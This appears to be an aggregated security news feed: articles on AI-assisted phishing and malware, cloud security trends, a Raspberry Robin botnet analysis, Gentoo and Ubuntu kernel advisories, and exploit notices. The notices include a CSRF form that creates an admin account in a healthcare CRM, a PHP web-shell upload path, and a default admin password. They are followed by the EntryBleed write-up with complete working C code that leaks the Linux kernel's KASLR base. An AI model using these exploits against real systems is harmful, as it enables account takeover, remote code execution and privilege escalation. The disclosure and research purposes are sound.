Current defenses are able to protect against today's AI-enhanced cybersecurity threats, but that won't be the case for long as these attacks become more effective and sophisticated.

Artificial intelligence and machine learning (AI/ML) models have already shown some promise in increasing the sophistication of phishing lures, creating synthetic profiles, and creating rudimentary malware, but even more innovative applications of cyberattacks will likely come in the near future.

Malware developers have already started toying with code generation using AI, with security researchers demonstrating that a full attack chain could be created. 

The Check Point Research team, for example, used current AI tools to create a complete attack campaign, starting with a phishing email generated by OpenAI's ChatGPT that urges a victim to open an Excel document. The researchers then used the Codex AI programming assistant to create an Excel macro that executes code downloaded from a URL and a Python script to infect the targeted system. 

Each step required multiple iterations to produce acceptable code, but the eventual attack chain worked, says Sergey Shykevich, threat intelligence group manager at Check Point Research.

"It did require a lot of iteration," he says. "At every step, the first output was not the optimal output — if we were a criminal, we would have been blocked by antivirus. It took us time until we were able to generate good code."

Over the past six weeks, ChatGPT — a large language model (LLM) based on the third iteration of OpenAI's generative pre-trained transformer (GPT-3) — has spurred a variety of what-if scenarios, both optimistic and fearful, for the potential applications of artificial intelligence and machine learning. The dual-use nature of AI/ML models have left businesses scrambling to find ways to improve efficiency using the technology, while digital-rights advocates worry over the impact the technology will have on organizations and workers. 

Cybersecurity is no different. Researchers and cybercriminal groups have already experimented with using GPT technology for a variety of tasks. Purportedly novice malware authors have used ChatGPT to write malware, although developers attempts to use the ChatGPT service to produce applications, while sometimes successful, often produce code with bugs and vulnerabilities.

Yet AI/ML is influencing other areas of security and privacy as well. Generative neural networks (GNNs) have been used to create photos of synthetic humans, which appear authentic but do not depict a real person, as a way to enhance profiles used for fraud and disinformation. A related model, known as a generative adversarial network (GAN), can create fake video and audio of specific people, and in one case, allowed fraudsters to convince accountants and human resources departments to wire $35 million to the criminals' bank account.

The AI systems will only improve over time, raising the specter of a variety of enhanced threats that can fool existing defensive strategies.

**Variations on a (Phishing) Theme**

For now, cybercriminals often use the same or similar template to create spear-phishing email messages or construct landing pages for business email compromise (BEC) attacks, but using a single template across a campaign increases the chance that defensive software could detect the attack.

So, one main initial use of LLMs like ChatGPT will be as a way to produce more convincing phishing lures, with more variability and in a variety of languages, that can dynamically adjust to the victim's profile.

To demonstrate the point, Crane Hassold, a director of threat intelligence at email security firm Abnormal Security, requested that ChatGPT generate five variations on a simple phishing email request. The five variations differed significantly from each other but kept the same content — a request to the human resources department about what information a fictional company would require to change the bank account to which a paycheck is deposited. 

**Fast, Undetectable Implants**

While a novice programmer may be able to create a malicious program using an AI coding assistant, errors and vulnerabilities still get in the way. AI systems' coding capabilities are impressive, but ultimately, they do not rise to the level of being able to create working code on their own.

Still, advances could change that in the future, just as malware authors used automation to create a vast number of variants of viruses and worms to escape detection by signature-scanning engines. Similarly, attackers could use AI to quickly create fast implants that use the latest vulnerabilities before organizations can patch.

"I think it is a bit more than a thought experiment," says Check Point's Shykevich. "We were able to use those tools to create workable malware."

**Passing the Turing Test?**

Perhaps the best application of AI system may be the most obvious: the ability to function as artificial humans. 

Already, many of the people who interact with ChatGPT and other AI systems — including some purported experts — believe that the machines have gained some form of sentience. Perhaps most famously, Google fired a software engineer, Blake Lemoine, who claimed that the company's LLM, dubbed LaMDA, had reached consciousness.

"People believe that these machines understand what they are doing, conceptually," says Gary McGraw, co-founder and CEO at the Berryville Institute of Machine Learning, which studies threats to AI/ML systems. "What they are doing is incredible, statistical predictive auto-associators. The fact that they can do what they do is mind boggling — that they can have that much cool stuff happening. But it is not understanding."

While these auto-associative systems do not have sentience, they may be good enough to fool workers at call centers and support lines, a group that often represents the last line of defense against account takeover, a common cybercrime.

**Slower Than Predicted**

Yet while cybersecurity researchers have quickly developed some innovative cyberattacks, threat actors will likely hold back. While ChatGPT's technology is "absolutely transformative," attackers will likely only adopt ChatGPT and other forms of artificial intelligence and machine learning, if it offers them a faster path to monetization, says Abnormal Security's Hassold. 

"AI cyberthreats have been a hot topic for years," Hassold says. "But when you look at financially motivated attackers, they do not want to put a ton of effort or work into facilitating their attacks, they want to make as much money as possible with the least amount of effort."

For now, attacks conducted by humans require less effort than attempting to create AI-enhanced attacks, such as deepfakes or GPT-generated text, he says.

**Defense Should Ignore the AI Fluff**

Just because cyberattackers make use of the latest artificial intelligence system does not mean the attacks are harder to detect, for now. Current malicious content produced by AI/ML models are typically icing on the cake — they make text or images appear more human, but by focusing on the technical indicators, cybersecurity products can still recognize the threat, Hassold stresses.

"The same sort of behavioral indicators that we use to identify malicious emails are all still there," he says. "While the email may look more legitimate, the fact that the email is coming from an email address that does not belong to the person who is sending it or that a link may be hosted on a domain that has been recently registered — those are indicators that will not change."

Similarly, processes in place to double check requests to change a bank account for payment and paycheck remittance would defeat even the most convincing deepfake impersonation, unless the threat group had access or control over the additional layers of security that have grown more common.

Better Phishing, Easy Malicious Implants: How AI Could Change Cyberattacks

Organizations are looking for new methods to safeguard the virtual machines, containers, and workload services they use in the cloud.

In 2022, we saw explosive transitions in the cloud security market — every aspect of the ecosystem, including vendors, products, and infrastructure, went through a radical change. It birthed new categories like data security posture management (DSPM), saw established vendors jumping to announce cloud data lakes like Amazon Security Lake, and put vendors through turmoil, like KnowBe4 being acquired by Vista Equity for $4.3 billion.

As we look forward to 2023, cybersecurity for workloads (virtual machines, containers, services) in the public cloud will continue to evolve, with customers trying to balance the need for aggressive cloud adoption and compliance with security needs. CIOs and CISOs will challenge their teams to build the foundation for a security platform that can consolidate point products, support multiple clouds (AWS, Azure, and GCP), and leverage automation to scale security operations. A zero-trust architecture will lead the way to workload protection in the cloud, real-time data protection, and centralized policy enforcement. Here’s a deeper dive into how these five dynamics will make their presence felt in 2023 with public cloud workloads.

**Generative Attacks Will Become Targeted and Personalized**

Automation and machine learning empower cybercriminals to launch sophisticated, targeted attacks. Scripted botnets can conduct network reconnaissance on cloud infrastructure, and valuable data can be harvested and used to launch further attacks. Malware packages are becoming a commodity, with readily available automated tools in which the level of abstraction enables even unimaginative minds to become lethal. For example, ChatGPT, which has taken the tech world by storm, can use machine learning to auto-script malware.

Cyberthreat researcher @lordx64 shared an example of malware auto-generated by ChatGPT. The malware used PowerShell to download ransomware using an obfuscation script, encrypt all the files, and exfiltrate the key to google.com.

**Centralized Security Posture Will Become the Norm to Tackle Workload Sprawl**

Misconfigurations due to human error remain the biggest root cause of cyberattacks. Many attacks use techniques such as code injection and buffer overflow to prey on weak configurations. With the cloud enabling workloads to be spun up and down frequently, configuring security policies at individual firewalls at every virtual private cloud (or a trust zone) opens the door for human error.

Organizations will increasingly look for architectures that can centralize cloud security policy definitions, enforcements, and remediations. Only when cyber prevention is delivered from a central platform can defense be applied to all workloads, instead of just a few select ones.

**Zero-Trust For Workload Protection Will Gain Momentum**

Zero trust will see widespread adoption to protect assets by enforcing an explicit trust framework for all assets in the public cloud. Implementing zero trust in the public cloud is different and unique because customers are dealing with ephemeral and dynamic resources. With zero trust platforms that were architectured for the cloud can bring down cost overruns and complexity. Before a workload in a public cloud can request a resource, it must go through an extensive trust check — one that combines identity, device risk, location, threat intelligence, behavioral analytics, and context. Upon successfully establishing explicit trust, the resource will then be subject to corporate security policy for access control.

**CIOs Will Look For More Effective Multicloud Security Tools**

When it comes to vendor best practices, CIOs are increasingly looking at diversified portfolios of public cloud infrastructure for three main reasons. They want to reduce reliance on a single vendor; many are also looking to integrate infrastructure inherited from mergers and acquisitions. And CIOs need to leverage best-of-breed services from different vendors, such as Google Cloud BigQuery for data analytics, AWS for mobile apps, Oracle Cloud for ERP, for example.

    

Figure: AWS shared responsibility model for protecting cloud resources.

Every cloud vendor preaches the notion of “shared security responsibility,” putting the onus on the customer to implement a security infrastructure for their cloud resources. Savvy IT shops ensure they pick a cybersecurity platform that supports multiple public cloud environments.

**Real-Time Data Protection Will Be a Core Criterion for Cloud Data Governance, Security**

Securing sensitive data such as protected health information, personally identifying information, financial information, patents, confidential corporate data, and other intellectual property is arduous when data moves to the cloud. Legacy data loss prevention (DLP) architectures that rely on regexes, scans, and static rules are insufficient and ineffective for DLP in the cloud.

The rise of the data security posture management category has provided critical visibility into the need for observability and real-time analysis. Proxy-based architectures that can decrypt and inspect all SSL traffic will become a cornerstone for enterprises that truly care about protecting their sensitive data.

Migration to the cloud is not a new trend in the corporate world, but the implications of cybersecurity for cloud workloads are still evolving. While there are no clear answers yet, these are some of the leading indicators customers will use to navigate in 2023.

Read more _Partner Perspectives_ from Zscaler.

5 Ways Cybersecurity for Cloud Workloads Will Evolve in 2023

A new analysis of Raspberry Robin's attack infrastructure has revealed that it's possible for other threat actors to repurpose the infections for their own malicious activities, making it an even more potent threat.
Raspberry Robin (aka QNAP worm), attributed to a threat actor dubbed DEV-0856, is malware that has increasingly come under the radar for being used in attacks aimed at finance,

A new analysis of Raspberry Robin's attack infrastructure has revealed that it's possible for other threat actors to repurpose the infections for their own malicious activities, making it an even more potent threat.

Raspberry Robin (aka QNAP worm), attributed to a threat actor dubbed DEV-0856, is malware that has increasingly come under the radar for being used in attacks aimed at finance, government, insurance, and telecom entities.

Given its use multiple threat actors to drop a wide range of payloads such as SocGholish, Bumblebee, TrueBot, IcedID, and LockBit ransomware, it's suspected to be a pay-per-install (PPI) botnet capable of serving next-stage payloads.

Raspberry Robin, notably, employs infected USB drives as a propagation mechanism and leverages breached QNAP network-attached storage (NAS) devices as first-level command-and-control (C2).

Cybersecurity firm SEKOIA said it was able to identify at least eight virtual private servers (VPSs) hosted on Linode that function as a second C2 layer that likely act as forward proxies to the next as-yet-unknown tier.

"Each compromised QNAP seems to act as a validator and forwarder," the France-based company said. "If the received request is valid, it is redirected to an upper level of infrastructure."

The attack chain thus unfolds as follows: When a user inserts the USB drive and launches a Windows shortcut (.LNK) file, the msiexec utility is launched, which, in turn, downloads the main obfuscated Raspberry Robin payload from the QNAP instance.

This reliance on msiexec to send out HTTP requests to fetch the malware makes it possible to hijack such requests to download another rogue MSI payload either by DNS hijacking attacks or purchasing previously known domains after their expiration.

One such domain is tiua\[.\]uk, which was registered in the early days of the campaign in late July 2021 and used as a C2 between September 22, 2021, and November 30, 2022, when it was suspended by the .UK registry.

"By pointing this domain to our sinkhole, we were able to obtain telemetry from one of the first domains used by Raspberry Robin operators," the company said, adding it observed several victims, indicating "it was still possible to repurpose a Raspberry Robin domain for malicious activities."

The exact origins of how the first wave of Raspberry Robin USB infections took place remain currently unknown, although it's suspected that it may have been achieved by relying on other malware to disseminate the worm.

This hypothesis is evidenced by the presence of a .NET spreader module that's said to be responsible for distributing Raspberry Robin .LNK files from infected hosts to USB drives. These .LNK files subsequently compromise other machines via the aforementioned method.

The development comes days after Google's Mandiant disclosed that the Russia-linked Turla group reused expired domains associated with ANDROMEDA malware to deliver reconnaissance and backdoor tools to targets compromised by the latter in Ukraine.

"Botnets serve multiple purposes and can be reused and/or remodeled by their operators or even hijacked by other groups over time," the researcher said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Analysis Reveals Raspberry Robin Can be Repurposed by Other Threat Actors

Gentoo Linux Security Advisory 202301-9 - A vulnerability has been discovered in protobuf-java which could result in denial of service. Versions less than 3.20.3 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202301-09  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: protobuf-java: Denial of Service  
     Date: January 11, 2023  
     Bugs: #876903  
       ID: 202301-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in protobuf-java which could result  
in denial of service.

Background  
==========

protobuf-java contains the Java bindings for Google's Protocol Buffers.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-java/protobuf-java     < 3.20.3                    >= 3.20.3

Description  
===========

Inputs containing multiple instances of non-repeated embedded messages  
with repeated or unknown fields causes objects to be converted back and  
forth between mutable and immutable forms, resulting in potentially long  
garbage collection pauses.

Impact  
======

Crafted input can trigger a denial of service via long garbage  
collection pauses.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All protobuf-java users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-java/protobuf-java-3.20.3"

References  
==========

[ 1 ] CVE-2022-3171  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3171  
[ 2 ] CVE-2022-3509  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3509  
[ 3 ] CVE-2022-3510  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3510

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202301-09

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202301-09

Ubuntu Security Notice 5793-3 - It was discovered that the io_uring subsystem in the Linux kernel did not properly perform reference counting in some situations, leading to a use- after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that a race condition existed in the Android Binder IPC subsystem in the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5793-3  
January 10, 2023

linux-gcp, linux-oracle vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems  
- linux-oracle: Linux kernel for Oracle Cloud systems

Details:

It was discovered that the io_uring subsystem in the Linux kernel did not  
properly perform reference counting in some situations, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-3910)

It was discovered that a race condition existed in the Android Binder IPC  
subsystem in the Linux kernel, leading to a use-after-free vulnerability. A  
local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2022-20421)

David Leadbeater discovered that the netfilter IRC protocol tracking  
implementation in the Linux Kernel incorrectly handled certain message  
payloads in some situations. A remote attacker could possibly use this to  
cause a denial of service or bypass firewall filtering. (CVE-2022-2663)

It was discovered that the sound subsystem in the Linux kernel contained a  
race condition in some situations. A local attacker could use this to cause  
a denial of service (system crash). (CVE-2022-3303)

It was discovered that the Sunplus Ethernet driver in the Linux kernel  
contained a read-after-free vulnerability. An attacker could possibly use  
this to expose sensitive information (kernel memory) (CVE-2022-3541)

It was discovered that a memory leak existed in the Unix domain socket  
implementation of the Linux kernel. A local attacker could use this to  
cause a denial of service (memory exhaustion). (CVE-2022-3543)

It was discovered that the NILFS2 file system implementation in the Linux  
kernel did not properly deallocate memory in certain error conditions. An  
attacker could use this to cause a denial of service (memory exhaustion).  
(CVE-2022-3544, CVE-2022-3646)

Gwnaun Jung discovered that the SFB packet scheduling implementation in the  
Linux kernel contained a use-after-free vulnerability. A local attacker  
could use this to cause a denial of service (system crash) or possibly  
execute arbitrary code. (CVE-2022-3586)

It was discovered that the hugetlb implementation in the Linux kernel  
contained a race condition in some situations. A local attacker could use  
this to cause a denial of service (system crash) or expose sensitive  
information (kernel memory). (CVE-2022-3623)

Khalid Masum discovered that the NILFS2 file system implementation in the  
Linux kernel did not properly handle certain error conditions, leading to a  
use-after-free vulnerability. A local attacker could use this to cause a  
denial of service or possibly execute arbitrary code. (CVE-2022-3649)

It was discovered that a race condition existed in the MCTP implementation  
in the Linux kernel, leading to a use-after-free vulnerability. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2022-3977)

It was discovered that a race condition existed in the EFI capsule loader  
driver in the Linux kernel, leading to a use-after-free vulnerability. A  
local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2022-40307)

Zheng Wang and Zhuorao Yang discovered that the RealTek RTL8712U wireless  
driver in the Linux kernel contained a use-after-free vulnerability. A  
local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2022-4095)

It was discovered that a race condition existed in the SMSC UFX USB driver  
implementation in the Linux kernel, leading to a use-after-free  
vulnerability. A physically proximate attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-41849)

It was discovered that a race condition existed in the Roccat HID driver in  
the Linux kernel, leading to a use-after-free vulnerability. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2022-41850)

It was discovered that the USB monitoring (usbmon) component in the Linux  
kernel did not properly set permissions on memory mapped in to user space  
processes. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2022-43750)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   linux-image-5.19.0-1014-gcp     5.19.0-1014.15  
   linux-image-5.19.0-1014-oracle  5.19.0-1014.16  
   linux-image-gcp                 5.19.0.1014.11  
   linux-image-oracle              5.19.0.1014.11

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-5793-3  
   https://ubuntu.com/security/notices/USN-5793-1  
   CVE-2022-20421, CVE-2022-2663, CVE-2022-3303, CVE-2022-3541,  
   CVE-2022-3543, CVE-2022-3544, CVE-2022-3586, CVE-2022-3623,  
   CVE-2022-3646, CVE-2022-3649, CVE-2022-3910, CVE-2022-3977,  
   CVE-2022-40307, CVE-2022-4095, CVE-2022-41849, CVE-2022-41850,  
   CVE-2022-43750

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-gcp/5.19.0-1014.15  
   https://launchpad.net/ubuntu/+source/linux-oracle/5.19.0-1014.16

Ubuntu Security Notice USN-5793-3

Medisense-Healthcare Solutions CRM version 2.0 suffers from a cross site request forgery vulnerability.

    ====================================================================================================================================| # Title     : Medisense-Healthcare Solutions CRM v2.0 CSRF Vulnerability                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             | | # Vendor    : https://medisensecrm.com                                                                                           |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin .[+] infected file : /Add-User1.php .[+] save code as poc.html .<h2>Add New User</h2>    <form name="frmCreateuser" method="POST" action="https://127.0.0.1/medisensecrmcom/Add-User1.php" onsubmit="return createUser()">    <h3>User Name :<input type="text" name="txtuser" class="txtfield fr"/></h3>    <h3>Password :<input type="password" name="txtNewPass" class="txtfield fr"/></h3>    <h3>Re-type Password :<input type="password" name="txtVerifyPass" class="txtfield fr"/></h3>    <h3>USer Type:<label class="fr" ><input type="radio" name="usertype" class="rdBtn fr" value="1" checked/>Executive</label><br><label class="fr">    <input type="radio" name="usertype" value="0" class="rdBtn fr"/>Admin</label></h3>    <input type="submit" name="cmdSubmit" value="SUBMIT" class="submitBtn" />  </div>  </form>    </div></div>Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

Medisense-Healthcare Solutions CRM 2.0 Cross Site Request Forgery

ERPGo SaaS CRM version 3.3 suffers from an arbitrary file upload vulnerability.

    ====================================================================================================================================| # Title     : ERPGo SaaS CRM v3.3 Arbitrary File Upload Vulnerability                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)                                              | | # Vendor    : https://codecanyon.net/item/erpgo-saas-all-in-one-business-erp-with-project-account-hrm-crm-pos/33263426           |  | # Dork      : "ERPGo SaaS" login                                                                                                 |                "All In One Business ERP With Project, Account, HRM, CRM"                                                          |“Attention is the new currency”  The more effortless the writing looks, the more effort the writer actually put into the process.  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : https://erpgo.127.0.0.1/ERPGo/register <====| Register New account [+] Go to your membership profile and upload a malicious file instead of an image <===| https://erpgo.127.0.0.1/erpgo-saas/profile[+] Your Ev!l = https://erpgo.127.0.0.1/erpgo-saas/storage/uploads/avatar/zip_1671699428.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

ERPGo SaaS CRM 3.3 Arbitrary File Upload

eCart Web version 4.0.0 appears to leave a default administrative account in place post installation.

    ====================================================================================================================================| # Title     : eCart Web v4.0.0- Multi Vendor eCommerce Marketplace Insecure Settings Vulnerability                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(64-bit)                                              | | # Vendor    : https://codecanyon.net/item/ecart-web-multi-vendor-ecommerce-marketplace/33201609                                  |  | # Dork      : Copyright © 2022 Made By WRTEAM.                                                                                   |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password  [+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=admin  & pass= admin123[+] https://127.0.0.1.com/admin/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

eCart Web 4.0.0 Insecure Settings

A flaw named "EntryBleed" was found in the Linux Kernel Page Table Isolation (KPTI). This issue could allow a local attacker to leak KASLR base via prefetch side-channels based on TLB timing for Intel systems.

Recently, I’ve discovered that Linux KPTI has implementation issues that can allow any unprivileged local attacker to bypass KASLR on Intel based systems. While technically only an info-leak, it still provides a primitive that has serious implications for bugs previously considered too hard to exploit and was assigned CVE-2022-4543. As you’ll see why from the writeup later on, I have decided to term this attack “EntryBleed.”

KPTI (or its original name KAISER) stands for Kernel Page Table Isolation. It was introduced as a patch for the Meltdown micro-architectural vulnerabilities a few years ago, where unprivileged attackers could utilize a side channel to bypass KASLR. According to documentation, KPTI basically splits apart the user and kernel page tables for each process. The kernel still has all of userspace virtual memory mapped in, but with the NX bit set; the user on the other hand will only have the minimal amount of kernel virtual memory mapped in, like exception/syscall entry handlers and anything else necessary for the user to kernel transition. KAISER actually stood for “Kernel Address Isolation to have Side-channels Efficiently Removed” and predates Meltdown, as other side-channel bypasses were already known to be an issue. If part of KPTI’s purpose is to act as a barrier against KASLR bypasses for CPU side-channel attacks, then clearly it has failed as of this post.

In 2016, Daniel Gruss discovered the concept of the prefetch sidechannel. I used one variant of it, which specifically utilized the TLB (the caching mechanism for virtual to physical address translations) as a side-channel mechanism. x86\_64 has a group of prefetch instructions, which “prefetch” addresses into the CPU cache. A prefetch will finish quickly if the address being loaded is already present in the TLB, but will finish slower when the address is not present (and a page table walk needs to be done). At its time, it was known that ASLR (and KASLR) could be bypassed by timing prefetches across a potential range of addresses using high resolution timing instructions like “RDTSC.”

Before I continue with the attack, it must be noted that my main inspiration came from Google ProjectZero’s recent blogpost on exploiting CVE-2022-42703. In the final section of the blogpost, they discuss how KPTI has been left off as more modern CPUs have Meltdown mitigations in silicon, but this makes them vulnerable to prefetch again. In this case, one would just assume “Ok, let me enable KPTI again then.” To quote the post: “kPTI was helpful in mitigating this side channel,” which would make perfect sense based on the purpose of KPTI/KAISER and seemed to be the consensus when talking to a few other security researcher friends.

For whatever reason, I had a gut feeling that something was wrong. I thought that maybe the minimal subset of kernel code that is still mapped while userspace code is running could be located with prefetch techniques. After an hour of digging, I noticed the following. In syscall_init, the address of entry_SYSCALL_64 (which is at a constant offset from KASLR base based on /proc/kallsyms) is stored in the LSTAR MSR, which holds the address of the kernel’s handler for when a 64 bit syscall gets executed. Notice how the handler executes a few instructions first before switching to the kernel CR3 (if KPTI is on) - this means that this function has to still be mapped in userspace page tables. I then performed a manual page table walk in a debugger using the user CR3, and it turns out that entry_SYSCALL_64 is mapped at the same address in userland as it is in kernel using its KASLR rebased address - this sounds very suspicious!

At this point, I was quite confident that a prefetch side-channel could reveal the location of entry\_SYSCALL\_64, and since it seemed to be slid with the rest of the kernel, the KASLR base as well. The overall idea is just to repeatedly execute syscalls to ensure that the page with entry_SYSCALL_64 (hence the name EntryBleed) gets cached in the instruction TLB, and then prefetch side-channel the possible range of addresses for that handler (as the kernel itself is guaranteed to be within 0xffffffff80000000 - 0xffffffffc0000000). 

An astute reader might wonder how the entry is preserved upon returning to userland despite the CR3 write when switching to kernel page tables. This is most likely due to the global bit being set on this page's page table entry, which would protect it from TLB invalidation on mov instructions to CR3. In fact, PTI documentation says the following: "global pages are disabled for all kernel structures not mapped into both kernel and userspace page tables." I originally suspected that PCID (which introduces separate TLB contexts to lower the occurrence of invalidation using the lower 12 bits of CR3) was the root cause as it often appears in discussions about performance optimization of Meltdown mitigations, but the KPTI CR3 bitmask shows no modifications to PCID. Perhaps I'm misunderstanding the code, so it would be great if someone can correct me if I'm wrong here.

Anyways, the resulting bypass is extremely simple. Unlike some other uarch attacks, it seems to work fine under normal load in normal systems, and I can deduce KASLR base on systems with KPTI with almost complete accuracy by just averaging 100 iterations. Note that the measurement code itself is from the original prefetch paper, with cpuid swapped with a fence instruction for it to work in VMs (credit goes to p0 for that technique). Below is my code (entry_SYSCALL_64_offset has to be adjusted based on kernel by setting it to the distance between it and startup\_64):

#include <stdio.h> #include <stdlib.h> #include <stdint.h> #define KERNEL\_LOWER\_BOUND 0xffffffff80000000ull #define KERNEL\_UPPER\_BOUND 0xffffffffc0000000ull #define entry\_SYSCALL\_64\_offset 0x400000ull uint64\_t sidechannel(uint64\_t addr) { uint64\_t a, b, c, d; asm volatile (".intel\_syntax noprefix;" "mfence;" "rdtscp;" "mov %0, rax;" "mov %1, rdx;" "xor rax, rax;" "lfence;" "prefetchnta qword ptr \[%4\];" "prefetcht2 qword ptr \[%4\];" "xor rax, rax;" "lfence;" "rdtscp;" "mov %2, rax;" "mov %3, rdx;" "mfence;" ".att\_syntax;" : "=r" (a), "=r" (b), "=r" (c), "=r" (d) : "r" (addr) : "rax", "rbx", "rcx", "rdx"); a = (b << 32) | a; c = (d << 32) | c; return c - a; } #define STEP 0x100000ull #define SCAN\_START KERNEL\_LOWER\_BOUND + entry\_SYSCALL\_64\_offset #define SCAN\_END KERNEL\_UPPER\_BOUND + entry\_SYSCALL\_64\_offset #define DUMMY\_ITERATIONS 5 #define ITERATIONS 100 #define ARR\_SIZE (SCAN\_END - SCAN\_START) / STEP uint64\_t leak\_syscall\_entry(void) { uint64\_t data\[ARR\_SIZE\] = {0}; uint64\_t min = ~0, addr = ~0; for (int i = 0; i < ITERATIONS + DUMMY\_ITERATIONS; i++) { for (uint64\_t idx = 0; idx < ARR\_SIZE; idx++) { uint64\_t test = SCAN\_START + idx \* STEP; syscall(104); uint64\_t time = sidechannel(test); if (i >= DUMMY\_ITERATIONS) data\[idx\] += time; } } for (int i = 0; i < ARR\_SIZE; i++) { data\[i\] /= ITERATIONS; if (data\[i\] < min) { min = data\[i\]; addr = SCAN\_START + i \* STEP; } printf("%llx %ld\\n", (SCAN\_START + i \* STEP), data\[i\]); } return addr; } int main() { printf ("KASLR base %llx\\n", leak\_syscall\_entry() - entry\_SYSCALL\_64\_offset); }

KASLR bypassed on systems with KPTI in less than 100 lines of C!

I’ve managed to have this work on multiple Intel CPUs (including i5-8265U, i7-8750H,  i7-9700F, i7-9750H, Xeon(R) CPU E5-2640) - I got it working on some VPS instances too but was unable to figure out the Intel CPU model there. It seems to work across a wide range of kernel versions with KPTI - I’ve tested it on Arch 6.0.12-hardened1-1-hardened, Ubuntu 5.15.0-56-generic, 6.0.12-1-MANJARO, 5.10.0-19-amd64, and a custom 5.18.3 build. It also works in KVM guests to leak the guest OS KASLR base (one would need to forward the host CPU features with "-cpu host" in QEMU for prefetch to even work though). I'm not sure how the TLB side-effects are preserved in a VM scenario though across CR3 writes and potential VM exits - if anyone has ideas, please let me know! As of now, I don’t think this attack affects AMD, but I also don't have direct access to any AMD hardware (see edit in the end). Lastly, I don't believe the repeated syscalls are necessary in my exploit as later tests show that it worked without making them with each measurement most likely due to the global bit, but I still kept it in my exploit just to guarantee its existence in the TLB.

Here is a demonstration of it (kernel base is printed before the shell for comparison purposes): 

One thing that could be done for increasing reliability would be accessing a lot of userspace addresses beforehand at specific strides to evict the TLB (and avoid false answers from other cached kernel addresses, which I saw with higher frequency on some systems). I also hypothesize that in scenarios without KPTI (like in ProjectZero’s case), prefetch would work even better if one were to trigger a specific codepath in kernel and specifically hunt for that offset during the side-channel.

In conclusion, Linux KPTI doesn’t do it’s job and it’s still quite easy to get KASLR base. I’ve already emailed security@kernel.org as well as relevant mailing lists for distros, and was authorized to disclose this as a potential fix might take a while. I’m honestly not too sure what the best approach to fix this as it’s more of an implementation issue, but I suggested that to randomize the virtual address of entry/exit handlers that are mapped into userspace, have them be at a fixed virtual address unrelated to kernel base, or have a randomized offset from kernel base. I suspect that this problem might really just be due to a major oversight; one kernel developer mentioned to me that this was definitely not the intent and might have been a regression.

